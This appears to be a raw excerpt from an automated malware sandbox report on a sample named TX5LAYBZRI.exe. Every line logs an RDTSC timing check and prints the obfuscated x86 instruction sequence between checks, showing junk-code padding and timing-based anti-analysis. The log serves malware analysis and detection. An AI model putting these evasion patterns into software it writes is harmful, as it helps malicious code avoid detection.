Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AE0B6 second address: 14AE0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AE0BA second address: 14AE0BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AE0BE second address: 14AE0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C390C second address: 14C3910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C3910 second address: 14C3916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C3916 second address: 14C3939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF108C7BF12h 0x0000000b pop edi 0x0000000c js 00007FF108C7BF18h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C3939 second address: 14C393D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C393D second address: 14C3941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C26C3 second address: 14C26C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C26C7 second address: 14C26D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C26D3 second address: 14C26D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C2F03 second address: 14C2F22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF108C7BF17h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C3094 second address: 14C309E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF108873976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C336D second address: 14C339C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FF108C7BF06h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF108C7BF18h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C339C second address: 14C33B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Ah 0x00000007 jp 00007FF108873976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14C6400 second address: 14C6410 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF108C7BF06h 0x00000008 jc 00007FF108C7BF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CA2DC second address: 14CA2E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CA2E2 second address: 14CA2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CF0B7 second address: 14CF0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CF0BB second address: 14CF0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 145436D second address: 1454393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF108873976h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CF258 second address: 14CF266 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FF108C7BF08h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CF266 second address: 14CF2B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 jbe 00007FF108873978h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jne 00007FF108873976h 0x00000019 jmp 00007FF108873981h 0x0000001e jg 00007FF108873976h 0x00000024 popad 0x00000025 jmp 00007FF108873989h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CF974 second address: 14CF9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF19h 0x00000009 jng 00007FF108C7BF06h 0x0000000f popad 0x00000010 jno 00007FF108C7BF0Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CF9A6 second address: 14CF9AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14CFF28 second address: 14CFF4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF15h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FF108C7BF0Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14D46B2 second address: 14D46B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14D46B6 second address: 14D46BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14577BE second address: 14577CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF108873976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14D34D6 second address: 14D34DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1493A14 second address: 12E09F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+122D2A47h] 0x00000012 mov dword ptr [ebp+122D18CCh], ecx 0x00000018 push dword ptr [ebp+122D0035h] 0x0000001e sub dword ptr [ebp+122D1956h], ebx 0x00000024 call dword ptr [ebp+122D1A23h] 0x0000002a pushad 0x0000002b jmp 00007FF10887397Eh 0x00000030 xor eax, eax 0x00000032 pushad 0x00000033 call 00007FF108873980h 0x00000038 mov ebx, dword ptr [ebp+122D2B83h] 0x0000003e pop ecx 0x0000003f jmp 00007FF10887397Dh 0x00000044 popad 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+122D38B9h], esi 0x0000004f mov dword ptr [ebp+122D28E3h], eax 0x00000055 pushad 0x00000056 mov di, 6547h 0x0000005a mov dword ptr [ebp+122D38B9h], edi 0x00000060 popad 0x00000061 mov esi, 0000003Ch 0x00000066 mov dword ptr [ebp+122D38B9h], esi 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 pushad 0x00000071 mov dword ptr [ebp+122D2DA6h], edi 0x00000077 mov bh, dh 0x00000079 popad 0x0000007a pushad 0x0000007b popad 0x0000007c lodsw 0x0000007e jmp 00007FF108873982h 0x00000083 sub dword ptr [ebp+122D1A06h], edx 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d mov dword ptr [ebp+122D2609h], ebx 0x00000093 mov ebx, dword ptr [esp+24h] 0x00000097 mov dword ptr [ebp+122D2674h], ecx 0x0000009d jmp 00007FF10887397Fh 0x000000a2 nop 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 push ebx 0x000000a6 jno 00007FF108873976h 0x000000ac pop ebx 0x000000ad rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1493BC3 second address: 1493BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1493BC7 second address: 1493BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1493C79 second address: 1493CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], esi 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FF108C7BF08h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jnl 00007FF108C7BF24h 0x0000002b nop 0x0000002c ja 00007FF108C7BF2Ah 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1493CF9 second address: 1493CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14943B8 second address: 14943BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14943BC second address: 14943D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14943D5 second address: 14943D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149456E second address: 149457D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149457D second address: 149458F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149458F second address: 1494595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1494595 second address: 1494599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1494034 second address: 1494038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14D3A31 second address: 14D3A3B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14D3D75 second address: 14D3DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873980h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF108873987h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D3DA6 second address: 14D3DB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF108C7BF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D40CA second address: 14D40CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D40CE second address: 14D410F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jne 00007FF108C7BF15h 0x00000012 jp 00007FF108C7BF24h 0x00000018 jmp 00007FF108C7BF18h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D410F second address: 14D413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 jmp 00007FF108873984h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108873980h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8C25 second address: 14D8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8D9A second address: 14D8DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8DA0 second address: 14D8DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF108C7BF16h 0x00000011 jmp 00007FF108C7BF0Fh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8F77 second address: 14D8FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FF10887397Ah 0x0000000a jmp 00007FF108873981h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 je 00007FF108873982h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8FA3 second address: 14D8FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF108C7BF06h 0x0000000a je 00007FF108C7BF0Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8FB7 second address: 14D8FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8FBF second address: 14D8FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D920B second address: 14D9219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF108873976h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D9219 second address: 14D9259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FF108C7BF2Ah 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108C7BF0Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D97FB second address: 14D9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D9801 second address: 14D980E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007FF108C7BF06h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8661 second address: 14D867A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873985h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D867A second address: 14D867E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D867E second address: 14D8692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF108873976h 0x0000000e jp 00007FF108873976h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DC273 second address: 14DC27C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DC27C second address: 14DC289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FF10887397Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DF497 second address: 14DF49C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DF49C second address: 14DF4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DF4A2 second address: 14DF4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF108C7BF17h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FF108C7BF0Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DECF1 second address: 14DECF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEE82 second address: 14DEE9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF108C7BF06h 0x00000008 jmp 00007FF108C7BF0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEE9F second address: 14DEEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108873985h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEB8 second address: 14DEEC4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF108C7BF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEC4 second address: 14DEEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873982h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEDC second address: 14DEEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEE0 second address: 14DEEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E320C second address: 14E3210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2C64 second address: 14E2C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2C68 second address: 14E2CAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF108C7BF18h 0x00000011 push esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 push edi 0x00000018 jmp 00007FF108C7BF14h 0x0000001d pop edi 0x0000001e popad 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CAD second address: 14E2CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CB3 second address: 14E2CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 jng 00007FF108C7BF06h 0x0000000c pop ecx 0x0000000d jng 00007FF108C7BF0Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CC8 second address: 14E2CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CD2 second address: 14E2CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2F7D second address: 14E2F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E5609 second address: 14E560D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E560D second address: 14E5611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E5611 second address: 14E561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E561D second address: 14E5623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E5623 second address: 14E5627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EAEAF second address: 14EAECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873983h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
